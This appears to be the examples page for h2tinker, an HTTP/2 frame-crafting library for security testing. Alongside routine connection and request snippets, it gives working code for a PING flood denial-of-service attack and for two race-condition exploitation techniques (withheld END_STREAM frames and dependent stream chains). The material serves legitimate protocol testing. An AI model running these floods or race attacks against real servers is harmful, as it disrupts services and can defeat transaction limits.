Examples

Set up an HTTP/2 connection with TLS

import h2tinker as h2

conn = h2.H2TLSConnection()
conn.setup('example.com')

Set up a plain HTTP/2 connection (h2c)

import h2tinker as h2

conn = h2.H2PlainConnection()
conn.setup('example.com')
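
Send a single request

This is a minimal sketch rather than a separate documented example: it only combines calls that appear elsewhere on this page (gen_stream_ids, create_request_frames, send_frames and infinite_read_loop) to send one plain GET request and wait for the response.

import h2tinker as h2

# ...
# Connection setup omitted
# ...

# Pick a valid client stream ID for the request
sid = h2.gen_stream_ids(1)[0]
# Create the request frames for GET /
req = conn.create_request_frames('GET', '/', sid)
# Send the request frames
conn.send_frames(req)
# Remain listening for the response
conn.infinite_read_loop()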

Sending Scapy frames

import h2tinker as h2
import scapy.contrib.http2 as scapy

# ...
# Connection setup omitted
# ...

# Scapy-generated frames can be sent directly
scapy_ping = scapy.H2Frame() / scapy.H2PingFrame('13371337')
conn.send_frames(scapy_ping)

# Remain listening for the ping response
conn.infinite_read_loop()
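
As an alternative to building the PING from raw Scapy classes, h2tinker's own helper (used in the ping flood example below) produces an equivalent frame. A short sketch, meant to replace the scapy_ping lines above before entering the read loop:

# Equivalent PING built with the h2tinker helper instead of Scapy classes
ping = h2.create_ping_frame()
conn.send_frames(ping)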

Ping flood attack

import h2tinker as h2

# ...
# Connection setup omitted
# ...

# Create 1000 ping frames to dump into the socket at once
pings = [h2.create_ping_frame() for _ in range(1000)]

# Send 1000 * 1000 PINGs
for _ in range(1000):
    conn.send_frames(*pings)

print('Done sending')

# Keep the connection open to force the server to respond
conn.infinite_read_loop()

Exploiting web app race conditions with HTTP/2

Triggering a race condition requires multiple requests to hit the application at (nearly) the same instant. The two methods below use HTTP/2 features to control the moment at which the server handles a batch of requests.

Last frame synchronisation method

The requests are first sent without the END_STREAM flag, so the server considers them incomplete and keeps the streams open. The withheld final DATA frames, which carry END_STREAM, are then sent in a single batch, completing all requests at almost the same moment.

import h2tinker as h2
import time
import scapy.contrib.http2 as scapy

# ...
# Connection setup omitted
# ...

# We gather the final DATA frames here
final_frames = []

# Generate 10 valid client stream IDs
for i in h2.gen_stream_ids(10):

    # Create request frames for POST /race
    req = conn.create_request_frames('POST', '/race', i)
    # Remove the END_STREAM flag from the HEADERS frame, which is always the first frame of the request
    req.frames[0].flags.remove('ES')
    # Send the request frames
    conn.send_frames(req)
    # Create the final DATA frame using scapy and store it
    final_frames.append(scapy.H2Frame(flags={'ES'}, stream_id=i) / scapy.H2DataFrame())

# Sleep a little to make sure previous frames have been delivered
time.sleep(5)
# Send the final frames to complete the requests
conn.send_frames(*final_frames)

# Remain listening on the connection
conn.infinite_read_loop()

Dependent streams method

The race requests are declared dependent on the last link of a chain of long-running requests. While the chain is being processed, the race requests are held back; once it completes, they should all be handled concurrently.

import h2tinker as h2

# ...
# Connection setup omitted
# ...

# Generate enough stream IDs
sids = h2.gen_stream_ids(20)
# 10 IDs will be used for the dependency chain
chain_sids = sids[:10]
# 10 IDs will be used for the concurrent race requests
race_sids = sids[10:]

# Here we gather the dep chain requests
dep_chain_reqs = []
# This is the root of the chain; it doesn't depend on any other request
root_req = conn.create_request_frames('POST', '/long', chain_sids[0])
dep_chain_reqs.append(root_req)

for i in range(len(chain_sids) - 1):
    # Stream ID of the previous link in the chain on which this request will depend
    prev_sid = chain_sids[i]
    # Stream ID of this request
    current_sid = chain_sids[i + 1]
    # Create the next link in the chain
    dep_req = conn.create_dependant_request_frames('POST', '/long', stream_id=current_sid, dependency_stream_id=prev_sid)
    dep_chain_reqs.append(dep_req)

# The last link in the chain on which all race requests will depend
end_of_chain_sid = chain_sids[-1]

# Create and gather the concurrent race requests
race_reqs = []
for sid in race_sids:
    race_req = conn.create_dependant_request_frames('POST', '/race', stream_id=sid, dependency_stream_id=end_of_chain_sid)
    race_reqs.append(race_req)

# First send the requests that create the dependency chain
conn.send_frames(*dep_chain_reqs)
# Finally, send the race requests that should get executed concurrently after the chain has completed
conn.send_frames(*race_reqs)

# Keep the connection open
conn.infinite_read_loop()